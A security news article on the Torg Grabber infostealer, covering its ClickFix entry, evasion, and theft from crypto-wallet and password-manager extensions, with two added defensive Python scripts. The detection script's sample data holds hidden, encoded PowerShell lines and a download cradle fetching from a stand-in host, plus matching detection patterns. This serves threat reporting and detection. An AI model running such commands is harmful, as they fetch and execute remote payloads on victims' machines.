Torg Grabber Malware Unleashes Sophisticated Assault on 728 Cryptocurrency Wallets and 850 Browser Extensions

A new and rapidly evolving information-stealing malware, dubbed Torg Grabber, has emerged with a sophisticated arsenal designed to pilfer sensitive data from a staggering 850 browser extensions, with a significant focus on cryptocurrency wallets. Cybersecurity researchers at Gen Digital have identified over 700 of these targeted extensions as belonging to cryptocurrency wallets, indicating a deliberate and high-impact campaign against digital asset holders. The malware’s initial point of entry is a cunning technique known as ClickFix, which involves hijacking the user’s clipboard to trick them into executing a malicious PowerShell command, thereby gaining a foothold on the victim’s system.
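The ClickFix entry point described above leaves a recognisable trace in process telemetry: a command pasted into the Run dialog is launched with explorer.exe as the parent of powershell.exe, typically with flags that hide the window, skip the profile, or decode and fetch a payload. The following is an added defender-side example (not code from Gen Digital, and not part of the original article) that scores such events. It assumes process-creation records have been normalised to simple key=value lines; the sample lines and the indicator weights are constructed for illustration.

```python
"""Score process-creation events for ClickFix-style PowerShell launches.

Added defender-side example; the sample telemetry below is constructed,
not real data. Heuristic: a command pasted into the Run dialog shows
explorer.exe as the parent of powershell.exe, and ClickFix lures rely on
flags that hide the window, suppress the profile, bypass execution policy,
pass an encoded command, or pull a second stage from the network.
"""
import re

# Constructed sample telemetry in key=value form (values with spaces are quoted).
SAMPLE_EVENTS = [
    'time=2026-01-12T09:14:03Z image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'parent=C:\\Windows\\explorer.exe cmdline="powershell -w hidden -nop -ep bypass -enc SQBFAFgAIA=="',
    'time=2026-01-12T09:20:41Z image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'parent=C:\\Windows\\explorer.exe cmdline="powershell -NoProfile -Command iex (irm https://example.invalid/p)"',
    'time=2026-01-12T09:31:07Z image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'parent="C:\\Program Files\\Microsoft VS Code\\Code.exe" cmdline="powershell -NoLogo"',
    'time=2026-01-12T09:35:55Z image=C:\\Windows\\System32\\notepad.exe '
    'parent=C:\\Windows\\explorer.exe cmdline="notepad.exe"',
]

# key=value or key="value with spaces"
_KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Each indicator matches a PowerShell switch (full or abbreviated) or a download cradle.
_INDICATORS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "no_profile": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "policy_bypass": re.compile(r"(?i)(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)\b"),
    "download_cradle": re.compile(
        r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"),
}


def parse_event(line):
    """Parse one key=value line into a dict; quoted values keep their spaces."""
    return {key: (quoted or bare) for key, quoted, bare in _KV_RE.findall(line)}


def score_event(event):
    """Return (score, matched indicator names) for one parsed event."""
    image = event.get("image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmdline = event.get("cmdline", "")
    hits = [name for name, rx in _INDICATORS.items() if rx.search(cmdline)]
    score = len(hits)
    # The Run dialog is hosted by explorer.exe, so that parent is weighted heavily;
    # an IDE or admin shell spawning PowerShell gets no such bonus.
    if event.get("parent", "").lower().endswith("\\explorer.exe"):
        hits.append("explorer_parent")
        score += 2
    return score, hits


def triage(lines, threshold=3):
    """Return (time, score, hits) for every event scoring at or above threshold."""
    flagged = []
    for line in lines:
        event = parse_event(line)
        score, hits = score_event(event)
        if score >= threshold:
            flagged.append((event.get("time"), score, hits))
    return flagged


if __name__ == "__main__":
    for when, score, hits in triage(SAMPLE_EVENTS):
        print(f"{when} score={score} indicators={','.join(hits)}")
```

With the constructed input, the two explorer-launched commands are flagged (scores 6 and 4) while the editor-spawned PowerShell and notepad are not. The threshold and weights are starting points for tuning against a fleet's own baseline, not a detection rule to deploy as-is.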

The alarming pace of Torg Grabber’s development is a key concern for cybersecurity professionals. Gen Digital’s analysis reveals a relentless evolution, with 334 unique malware samples compiled in just three months, spanning from December 2025 to February 2026. This rapid iteration suggests a dedicated and well-resourced threat actor actively refining their tools to bypass existing defenses and maximize their illicit gains. Furthermore, the constant registration of new command-and-control (C2) servers on a weekly basis underscores the malware’s robust infrastructure and its ability to adapt to takedown efforts.

Beyond its primary focus on cryptocurrency wallets, Torg Grabber demonstrates a broad appetite for sensitive information. It actively targets data from 103 password manager extensions, two-factor authentication tools, and a further 19 note-taking applications. This comprehensive data harvesting strategy indicates a multifaceted approach to accumulating personal and financial credentials, aiming to maximize the potential for fraud and identity theft.

The Rapid Evolution of a Digital Predator

The technical report released by Gen Digital this week offers a detailed account of Torg Grabber’s developmental trajectory. Initially, the malware relied on a Telegram-based channel for its data exfiltration. This was subsequently upgraded to a custom, encrypted TCP protocol. However, in a significant shift on December 18, 2025, both of these methods were abandoned in favor of a more resilient and stealthy approach: an HTTPS connection routed through Cloudflare’s extensive infrastructure. This strategic move not only enhances the malware’s ability to evade detection but also facilitates more efficient data transfer through chunked uploads and payload delivery.

The malware is equipped with a formidable suite of anti-analysis mechanisms designed to thwart security researchers and automated detection systems. It employs multi-layered obfuscation techniques, making it exceptionally difficult to decompile and understand its inner workings. Moreover, Torg Grabber leverages direct syscalls and reflective loading. Direct syscalls allow the malware to interact directly with the operating system’s core functions, bypassing standard API calls that are often monitored by security software. Reflective loading, on the other hand, enables the malware to load its final payload entirely into memory without writing it to disk, a technique that significantly reduces its footprint and makes it harder for file-based antivirus solutions to detect.


A critical development in Torg Grabber’s evolution occurred on December 22, 2025, when it incorporated a bypass for App-Bound Encryption (ABE). ABE is a security feature implemented by major Chromium-based browsers, including Chrome, Brave, Edge, Vivaldi, and Opera, to protect cookies from being easily stolen by malicious extensions. By circumventing this protection, Torg Grabber joins a growing number of information-stealers that have successfully found ways to overcome Chrome’s latest defenses, highlighting an ongoing arms race between malware developers and browser security teams.

Adding to its sophisticated toolkit, researchers also identified a standalone tool named "Underground." This utility is specifically designed for extracting browser data. It achieves this by reflectively injecting a Dynamic Link Library (DLL) into the browser process. This allows it to access Chrome’s COM Elevation Service and, crucially, extract the master encryption key used by the browser. This method of stealing the master encryption key is a technique that has also been recently observed in other high-profile infostealer malware, such as VoidStealer, indicating a shared playbook among sophisticated threat actors.

Extensive Data Theft Capabilities: Targeting the Digital Lifeline

Gen Digital’s comprehensive analysis, available on their research blog, reveals the extensive reach of Torg Grabber. The malware targets a broad spectrum of web browsers, specifically enumerating 25 Chromium-based browsers and 8 Firefox variants. Its primary objective within these browsers is to abscond with user credentials, session cookies, and autofill data – all of which are vital components for online activity and account access.

The sheer scale of Torg Grabber’s cryptocurrency wallet targeting is particularly alarming. Of the 850 browser extensions it enumerates, a staggering 728 are designed for managing digital assets. The researchers wryly observe that this list covers "essentially every crypto wallet ever conceived by human optimism," underscoring the malware’s comprehensive approach to capturing the digital wealth of its victims. Prominent names on this hit list include MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare. However, the threat is not confined to these well-known entities. Torg Grabber diligently targets lesser-known, "long tail" wallets, demonstrating a broad-brush approach to maximizing its potential victim pool, irrespective of the wallet’s popularity.

The malware’s data harvesting extends beyond digital currency. It also targets a significant list of 103 extensions dedicated to password management, token generation, and authentication. This includes widely used services such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, and various two-factor authentication apps like 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. This broad targeting of authentication and credential management tools suggests a strategy to gain access to a wide array of online accounts, not just those related to cryptocurrency.
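Because the wallet and credential-manager extensions listed in the two paragraphs above are exactly what the stealer enumerates, a defender's first step is knowing which of them are installed on managed browsers. The following is an added example (not code from Gen Digital or the article) that inventories a Chromium profile's extensions and flags those whose names match the families named in the report. It assumes Chromium's on-disk layout of `<profile>/Extensions/<id>/<version>/manifest.json`, resolves the `__MSG_key__` localisation indirection many extensions use for their name, and builds its own constructed sample profile with placeholder extension IDs so it runs offline.

```python
"""Inventory Chromium extensions in a profile and flag wallet / credential-manager names.

Added defender-side example. Layout assumed (Chromium convention):
  <profile>/Extensions/<extension id>/<version>/manifest.json
Extension names are often "__MSG_key__" and resolved through
_locales/<default_locale>/messages.json; the scanner handles that case.
The sample profile built by build_sample_profile() is constructed, with
placeholder IDs that are not real extension IDs.
"""
import json
import os
import re
import tempfile

# Name fragments taken from the article's target list; matched on word boundaries
# to keep short names like "sui" or "okx" from hitting unrelated extensions.
_FAMILIES = {
    "crypto_wallet": ["metamask", "phantom", "trustwallet", "trust wallet", "coinbase",
                      "binance", "exodus", "tronlink", "ronin", "okx", "keplr", "rabby",
                      "sui", "solflare"],
    "credential_manager": ["lastpass", "1password", "bitwarden", "keepass", "nordpass",
                           "dashlane", "protonpass", "proton pass", "enpass", "psono",
                           "heylogin", "authenticator"],
}
WATCHLIST = {cat: [re.compile(r"\b" + re.escape(f) + r"\b", re.I) for f in names]
             for cat, names in _FAMILIES.items()}

_MSG_RE = re.compile(r"^__MSG_(\w+)__$")


def resolve_name(ext_dir, manifest):
    """Return the display name, resolving Chromium's __MSG_key__ indirection if present."""
    name = manifest.get("name", "")
    match = _MSG_RE.match(name)
    if not match:
        return name
    locale = manifest.get("default_locale", "en")
    path = os.path.join(ext_dir, "_locales", locale, "messages.json")
    try:
        with open(path, encoding="utf-8") as fh:
            return json.load(fh)[match.group(1)]["message"]
    except (OSError, KeyError, ValueError):
        return name  # leave the placeholder unresolved rather than guess


def classify(name):
    """Return the watchlist category a name falls in, or None."""
    for category, patterns in WATCHLIST.items():
        if any(p.search(name) for p in patterns):
            return category
    return None


def inventory(profile_dir):
    """Return (extension_id, version, name, category) for every installed extension."""
    rows = []
    ext_root = os.path.join(profile_dir, "Extensions")
    if not os.path.isdir(ext_root):
        return rows
    for ext_id in sorted(os.listdir(ext_root)):
        id_dir = os.path.join(ext_root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            ext_dir = os.path.join(id_dir, version)
            manifest_path = os.path.join(ext_dir, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
            name = resolve_name(ext_dir, manifest)
            rows.append((ext_id, version, name, classify(name)))
    return rows


def build_sample_profile():
    """Create a constructed profile in a temp dir (placeholder IDs) and return its path."""
    profile = tempfile.mkdtemp(prefix="chromium_profile_")
    fixtures = [  # (placeholder id, version, manifest, en messages or None)
        ("a" * 32, "1.0.0", {"name": "__MSG_appName__", "default_locale": "en"},
         {"appName": {"message": "MetaMask"}}),
        ("b" * 32, "2.3.1", {"name": "Bitwarden Password Manager"}, None),
        ("c" * 32, "4.9.0", {"name": "Dark Reader"}, None),
    ]
    for ext_id, version, manifest, messages in fixtures:
        ext_dir = os.path.join(profile, "Extensions", ext_id, version)
        os.makedirs(ext_dir)
        with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
        if messages:
            locale_dir = os.path.join(ext_dir, "_locales", "en")
            os.makedirs(locale_dir)
            with open(os.path.join(locale_dir, "messages.json"), "w", encoding="utf-8") as fh:
                json.dump(messages, fh)
    return profile


if __name__ == "__main__":
    for ext_id, version, name, category in inventory(build_sample_profile()):
        print(f"{ext_id} {version:8} {name:30} {category or '-'}")
```

Point `inventory()` at a real profile directory (for example the `Default` profile under a browser's user-data directory) to see which flagged extension families a host actually carries; that list is what determines which users need a credential and seed-phrase rotation if a ClickFix compromise is suspected. Name matching is a convenience for a report-driven watchlist; production inventories should key on extension IDs, which the page does not supply.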

Furthermore, Torg Grabber exhibits capabilities that extend beyond browser-based data theft. It actively seeks information from popular communication and gaming platforms like Discord and Steam, as well as VPN applications, FTP clients, and email clients. It also targets desktop cryptocurrency wallet applications, further solidifying its position as a comprehensive digital thief.


The malware’s functionality is further enhanced by its ability to profile the compromised host system. It can create a hardware fingerprint, catalog installed software – including a list of 24 antivirus tools, presumably to identify potential obstacles – and capture screenshots of the user’s desktop. It also demonstrates the capacity to exfiltrate files directly from the user’s Desktop and Documents folders, potentially exposing sensitive personal and financial documents.

A notable advanced capability is Torg Grabber’s ability to execute shellcode on the compromised device. This shellcode is delivered in a ChaCha-encrypted, zlib-compressed format directly from the C2 server. This allows the threat actor to dynamically deploy new malicious functionalities or updates without requiring a full malware re-compilation, offering a high degree of flexibility and adaptability.

A Growing Threat with Expanding Operator Base

Gen Digital issues a stern warning that Torg Grabber’s rapid development is an ongoing concern. The weekly registration of new C2 domains indicates a continuous effort to maintain its operational infrastructure and evade detection. Moreover, the analysis has revealed an expanding operator base, with researchers documenting approximately 40 distinct tags associated with the malware’s activity during their investigation. This suggests that Torg Grabber is not the product of a single individual or small group but potentially a more organized and distributed criminal enterprise, making it a more persistent and widespread threat.

The implications of Torg Grabber’s capabilities are far-reaching. For individual cryptocurrency users, the risk of losing significant financial assets due to compromised wallets is exceptionally high. The ability to bypass advanced browser security features like ABE and to steal master encryption keys represents a significant advancement in the capabilities of infostealer malware. Beyond financial losses, the theft of credentials from password managers and other sensitive applications can lead to widespread account compromise, identity theft, and further financial fraud.

For organizations, the presence of such sophisticated malware on user devices can lead to data breaches, reputational damage, and significant financial costs associated with incident response and recovery. The malware’s ability to fingerprint systems and document installed software could also be leveraged for more targeted attacks or to gather intelligence for future campaigns.

The rapid evolution and expansion of Torg Grabber underscore the need for continuous vigilance and robust cybersecurity practices. Users are strongly advised to exercise extreme caution when installing browser extensions, to only download from trusted sources, and to regularly update their browsers and security software. The ongoing cat-and-mouse game between malware developers and security researchers highlights the critical importance of proactive threat intelligence and advanced detection mechanisms to stay ahead of emerging cyber threats like Torg Grabber. The expansion of its operator base suggests that this malware will likely remain a significant threat for the foreseeable future.
